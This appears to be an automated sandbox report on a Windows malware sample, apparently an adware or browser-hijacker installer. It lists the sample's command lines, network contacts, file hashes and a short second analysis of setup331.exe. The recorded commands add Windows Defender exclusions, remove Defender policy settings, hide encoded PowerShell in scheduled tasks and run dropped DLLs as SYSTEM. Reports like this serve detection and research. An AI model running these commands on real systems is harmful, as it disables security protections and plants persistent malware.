"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gCgzsyGQr" /SC once /ST 02:07:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gCgzsyGQr"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gCgzsyGQr"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 07:40:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe\" VS /site_id 525403 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FTlmQXMDCFpnewAuq"
C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe
C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe VS /site_id 525403 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\wTvaWw.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\PkhsMVd.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zeLHdclAQOoTZxj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\gQNcOWE.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\GjMlpvz.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\uuRcAjq.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\NDjBuRm.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 07:25:32 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\fJSjsJgR\ZOHjBiK.dll\",#1 /site_id 525403" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "dBpreMcpfXbehynYz"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\fJSjsJgR\ZOHjBiK.dll",#1 /site_id 525403
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\fJSjsJgR\ZOHjBiK.dll",#1 /site_id 525403
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | addons.mozilla.org | udp |
| US | 151.101.65.91:80 | addons.mozilla.org | tcp |
| US | 151.101.65.91:443 | addons.mozilla.org | tcp |
| US | 151.101.65.91:443 | addons.mozilla.org | tcp |
| US | 151.101.65.91:443 | addons.mozilla.org | tcp |
| US | 151.101.65.91:443 | addons.mozilla.org | tcp |
| US | 151.101.65.91:80 | addons.mozilla.org | tcp |
| US | 151.101.65.91:443 | addons.mozilla.org | tcp |
| US | 151.101.65.91:443 | addons.mozilla.org | tcp |
| US | 151.101.65.91:443 | addons.mozilla.org | tcp |
| US | 151.101.65.91:443 | addons.mozilla.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | api.check-data.xyz | udp |
| US | 44.226.34.177:80 | api.check-data.xyz | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe
| MD5 | 3b76af9e2510171d3739b8bc9ee2ee68 |
| SHA1 | 4c8148a587ba7e6de8963c2d4dbbcceac39b3694 |
| SHA256 | 3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768 |
| SHA512 | d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94 |
\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe
| MD5 | ad10a30760d467dade24f430b558b465 |
| SHA1 | 7aaa56e80264c27d080c3b77055294593eacca1b |
| SHA256 | 44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a |
| SHA512 | 23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63 |
memory/2088-23-0x0000000010000000-0x0000000010F04000-memory.dmp
memory/2608-30-0x000000001B650000-0x000000001B932000-memory.dmp
memory/2608-31-0x0000000002810000-0x0000000002818000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 512689431c526b3877d145daae6b3b37 |
| SHA1 | 35366f6952ce97d1331ebe3a5223e77ba647e7e8 |
| SHA256 | 50f883f11e3afe182b8c826932c8df0e8e485c9049750653122f363a90a6b6e5 |
| SHA512 | 9ea20db6720a4152d439baba1d6efc2f91841bd9d0a885a8c464042a9e49555e10503f5464a189dbd6c0e4979fc9299ba53141fb6bae370308306495e0e24259 |
memory/1944-50-0x0000000001E80000-0x0000000001E88000-memory.dmp
memory/1944-49-0x000000001B660000-0x000000001B942000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 22442755e316777ad64c18b0294848a3 |
| SHA1 | d4883d517b39f2a13288bd2d909d27e8f7455e9f |
| SHA256 | b06854cfcc1a6bbffec5ba399f076749c5206e242f5273154160a36646f9181f |
| SHA512 | bd3c37fc4d638cf5882b7f39388508954c11f9ac092221d8c4a94b777caf9dabdda601eecc7806043188a8d9128a03eed6d287770949e300dc415a5d74dbea8d |
memory/884-60-0x000000001B770000-0x000000001BA52000-memory.dmp
memory/884-61-0x0000000001F40000-0x0000000001F48000-memory.dmp
C:\Windows\Temp\biwNYXhGTKCQxjLv\cmhOiYys\dWuMemSkgQhOHvSI.wsf
| MD5 | 94e3f041d8ea046678247aa60dad93f0 |
| SHA1 | 05c41707e24956bea84e866e47668c87272ded9b |
| SHA256 | 07eff7333d08763e82ccdc124afaa8cb36906b6a2ff34b5479f80e5722c0d1e9 |
| SHA512 | d3234f481cb56722bceab83a515405aa758936cda44ec30d3b9a408e3dcd3e21f8765ef7a4442913e2f5ffb37869f1a1f859d66d0d9c1b819d891475e610059a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 295ef5757d8c391efbb816a37e7484e2 |
| SHA1 | f9f00d91a602020467c8c39efa4462e0357db1d5 |
| SHA256 | 6edc726e47447841973c3f32ca325ac07e116ac1d307bd3f25414c7fce6238bb |
| SHA512 | 52b83db85289d3e32aa31ef8c203605d96cc8c7d508ce24131d53e0fa6417d1f353768bcf458b10abfc407ecf16761965ac8e28e600b00d9aa89b264e5237eea |
memory/2660-87-0x0000000003430000-0x00000000034B5000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
| MD5 | 6668505758ae5e6b20882f77d4e100ea |
| SHA1 | b0f20e9ee3604cbb3285643812921f0cb75503c9 |
| SHA256 | d50cc2b8cc8bcf26f5e3f0ab866c7f855c9fce08a5e06e14e58d791babf2f889 |
| SHA512 | 56a388f771c8b6b0c9c1399076c8a201023d679b234b0a48d030d002cacbeee4316f99d827a6e068532ea8794785e83527a48a06ec4fbb3e1af0b182c294d080 |
memory/2660-122-0x00000000012A0000-0x000000000130B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
| MD5 | 103efdadea8dc9131b76649cbba6bedf |
| SHA1 | 30d71efcf6b0935bde43f50f336d886a8a6b8585 |
| SHA256 | f7940488e3457006f40052a873db5f5d403d81b10d566a58a84eb95a5eb419ff |
| SHA512 | f914fb73d4e2a469e54f9832b986738d12737d86687de41aae65add5fb3327a49d72653120c1d1f954d04981263259badf420cb017205c4f417bd4d07528675c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Program Files (x86)\oWxSecJNU\PkhsMVd.xml
| MD5 | ea2d32637d65894f9eaec679291f1e83 |
| SHA1 | 282f56ed34a6330f819091627dae370c3be0be56 |
| SHA256 | 61ef38d52c7a2cdbeab46677a611e7924ccdc020f5816766d0af06554bc19168 |
| SHA512 | 177372efb423158b26e4c0dc7416e05be10a77014136cb524679dccb7dff282536b90af97939d74ce772914b047a89224f403de002ed9a01375f73e03eda872e |
C:\Program Files (x86)\YNUWFfCEdUiU2\gQNcOWE.xml
| MD5 | d836f34ef7cb4476b468f6cc1866f6da |
| SHA1 | aac717790f6b225016827d1925730bdcbcaabfe8 |
| SHA256 | 3c56a3579841566739553771d65d10252304a19d4b8adba9c8f8d8253bb55617 |
| SHA512 | bb46fd681f2c328e27b599c5ca0fe8083da50f5b5e66a550fc5d26e38aeb01ade31336ff2ea7183c1ce773b63a129b816855a86edff7604d1765c83ff752da63 |
C:\ProgramData\eiYaNjTCbhfbMeVB\GjMlpvz.xml
| MD5 | 2bbfca38a3b96d5464a9f23d4473c53b |
| SHA1 | 5f444537726dbb418d0acf31ec0eb096332ff841 |
| SHA256 | 54ab6131fbad3efa3de7ba2d18c6918c73563c30df771f48d4477c84d56ce1ed |
| SHA512 | cd885f2a9456b99e9781f8128ef71f986aa0f193e1f9efa4972bd2e7f495a0410784bfca67fa0ad9fa8129c29af1ad65ca6a5160d1bdd329b8f3b4a81af7bc3e |
C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\uuRcAjq.xml
| MD5 | c6a459d7dd91a1268250e1f62a508797 |
| SHA1 | 35506e92f73284d9b6018029164c3f3a090db8a4 |
| SHA256 | 141ece9dc8c85a5c460448e464dd67568473cad9b50e1b2e76f1ef6f1061034e |
| SHA512 | 32fd76014615dfbf009389f08629862fcaf470c3743d89750a4da95a9265003179a202c18de855bd6836e509256986258ff2d541fe94d2661339899a9a66d418 |
C:\Program Files (x86)\LsajhStaXkJRC\NDjBuRm.xml
| MD5 | 8638dc81e0c3727dd2720c2cc271a752 |
| SHA1 | 92e23d91e92e788a3da8825fc16eabfff23c392e |
| SHA256 | 45b14acd84eacfe2de914415f3d56c9fc9ec4f2ed10d9feef6f95f710abace11 |
| SHA512 | 4a0089bd204154e6f34158c035ce62262ae1f67bd2acbb4deec0a58caf26517b11adb417c3a1d61e6cca92df7add5fd92f78edb41d6297b5ded7ccf7ede77aa9 |
memory/2660-291-0x0000000003970000-0x00000000039E3000-memory.dmp
C:\Windows\Temp\biwNYXhGTKCQxjLv\fJSjsJgR\ZOHjBiK.dll
| MD5 | 617698f01c7cceb3b262a98ba4da5a98 |
| SHA1 | c9244abc65ab3c485cc197ddea5e846b65d14bad |
| SHA256 | 9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754 |
| SHA512 | 3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs.js
| MD5 | bad9851ac92d4385610db42a04db5ec8 |
| SHA1 | 996e21351f05fcf79fd31254b20448005f7c924d |
| SHA256 | e07224a77fec5d70d7d7e7985c0f67e67fe27488013df79387e25beb7a370cd8 |
| SHA512 | 1beca2278bedbc8025a64fae8cbff6be2444c4001c1afcc7ad57cc9e0ce4794c92dae8b1e1a0b6dfc953d8f14a5dcf10eb509c1e1bce5394d05af2c4981f7c75 |
memory/2660-301-0x0000000004B70000-0x0000000004C2D000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 020cc5815b6254caf3a8f4ae4af8e145 |
| SHA1 | adbfbdcad7a8e28a50abc701b5ff2efeeaa2088c |
| SHA256 | 3d2b07524706f7b25d5f24f776c5a12e2b2e1ceac8551c418ad4c07e1e905951 |
| SHA512 | 9dacfb62f40b03baaecd32098a152d523bea7f0178bd683fc2fd34715c58e081bd09cef0bae058e784976b6e269958481a94edc6f5f2fced0143bd17f1e36b6b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e83cd1a56c56efa07587dec0d18951ff |
| SHA1 | f800e938f16b6d5e94703db57f856ef87a7ab97e |
| SHA256 | 64cc007965e9dcb43466ce96a4d4fdb42ad34df7cdf8a4e5c5326a841ae8988d |
| SHA512 | 156f92eaf83b22e12909aa9973f2bb8d09bcadde9138c1a0c42b0f74a627c2f0031d2ce0e45fc77b38672d6fae91acca517ad8d5392f976c55e3f949c9fa9fdc |
memory/2716-327-0x0000000001470000-0x0000000002374000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2656 wrote to memory of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2656 wrote to memory of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2656 wrote to memory of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2656 wrote to memory of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2656 wrote to memory of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2656 wrote to memory of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2656 wrote to memory of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe
"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" -s MYQXM.k
Network
| Country | Destination | Domain | Proto |
| US | 76.95.39.48:8080 | tcp | |
